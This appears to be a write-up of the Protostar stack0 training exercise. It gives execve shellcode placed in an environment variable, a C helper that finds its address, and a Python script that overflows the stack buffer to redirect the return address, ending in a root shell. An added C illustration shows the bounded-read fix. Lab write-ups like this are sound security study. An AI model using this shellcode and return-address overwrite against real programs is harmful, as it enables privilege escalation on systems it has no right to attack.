@plvhx
Last active December 22, 2016 12:54
protostar stack0 exploit

Place shellcode in environment variable

$ export PAYLOAD=$(python -c 'import sys;sys.stdout.write("\x90"*(100) + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")')

Find the address of the 'PAYLOAD' environment variable

#include <stdio.h>
#include <stdlib.h>

int main(void) {
  /* getenv() returns NULL when PAYLOAD was not exported in this shell */
  char *addr = getenv("PAYLOAD");

  if (addr == NULL) {
    fprintf(stderr, "PAYLOAD is not set\n");
    return 1;
  }

  /* 32-bit target, so the pointer value fits in an unsigned int */
  printf("PAYLOAD: %#08x\n", (unsigned int)addr);
  return 0;
}

pwn.py (or use whatever simpler approach you prefer...)

#! /usr/bin/python -W ignore::DeprecationWarning
# Python 2: the payload is assembled as a byte string (str)

import sys
import struct
from subprocess import call

# pack a 32-bit integer in the host's byte order (x86 Protostar: little-endian)
if sys.byteorder == 'little':
  Q = lambda x: struct.pack("<I", x)
elif sys.byteorder == 'big':
  Q = lambda x: struct.pack(">I", x)

# 0x40 bytes fill the 64-byte buffer, the next 4 land on 'modified',
# 0x10 more pad up to the saved return address, which is then pointed
# at the NOP sled in the PAYLOAD environment variable
payload = "\x41"*(0x40) + Q(0xdeadbeef) + "\x41"*(0x10) + Q(<addr of 'PAYLOAD' env var>)

# write the payload to a file and close it before it is fed to stack0
with open("/tmp/pl", "w") as f:
  f.write(payload)

with open("/tmp/pl", "r") as f:
  call(["./stack0"], stdin=f)
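As an added illustration (not code from the gist), a small C model of why the first 0x44 bytes of that payload land on `modified`, and how a bounded read (`fgets` with `sizeof buffer`) leaves it at 0. The `stack0_locals` struct and the function names are constructed here; the model assumes stack0's 64-byte buffer sits directly below `modified`, as the payload layout implies.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* stack0's locals as laid out in memory: 'modified' sits right after buffer[64]. */
struct stack0_locals {
    char buffer[64];
    uint32_t modified;
};

/* Constructed sample: the payload's first 0x44 bytes, 0x40 filler bytes then
 * 0xdeadbeef packed in host byte order as pwn.py's Q() does. */
size_t build_sample_line(unsigned char *out, size_t cap) {
    uint32_t marker = 0xdeadbeef;
    if (cap < 64 + sizeof marker) return 0;
    memset(out, 'A', 64);
    memcpy(out + 64, &marker, sizeof marker);
    return 64 + sizeof marker;
}

/* Models gets(): copies every input byte, so anything past buffer[63] lands
 * on 'modified' (and, in the real program, on the saved frame beyond it).
 * The copy is clamped to the struct only to keep this model well-defined. */
uint32_t read_unbounded(const unsigned char *line, size_t len) {
    struct stack0_locals f;
    memset(&f, 0, sizeof f);
    if (len > sizeof f) len = sizeof f;
    memcpy(&f, line, len);
    return f.modified;
}

/* The fix: copy at most sizeof buffer - 1 bytes (the bound fgets(buffer,
 * sizeof buffer, stdin) enforces) and NUL-terminate; 'modified' is untouched. */
uint32_t read_bounded(const unsigned char *line, size_t len) {
    struct stack0_locals f;
    size_t n = sizeof f.buffer - 1;
    memset(&f, 0, sizeof f);
    if (len < n) n = len;
    memcpy(f.buffer, line, n);
    f.buffer[n] = '\0';
    return f.modified;
}

int main(void) {
    unsigned char line[68];
    size_t len = build_sample_line(line, sizeof line);
    printf("gets-style : modified = %#x\n", (unsigned)read_unbounded(line, len));
    printf("fgets-style: modified = %#x\n", (unsigned)read_bounded(line, len));
    return 0;
}
```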

Wrapping it up...

$ python pwn.py
you have changed the 'modified' variable
python -c 'import pty;pty.spawn("/bin/sh")'
# whoami
root
# echo -e "And there u have it.. :)"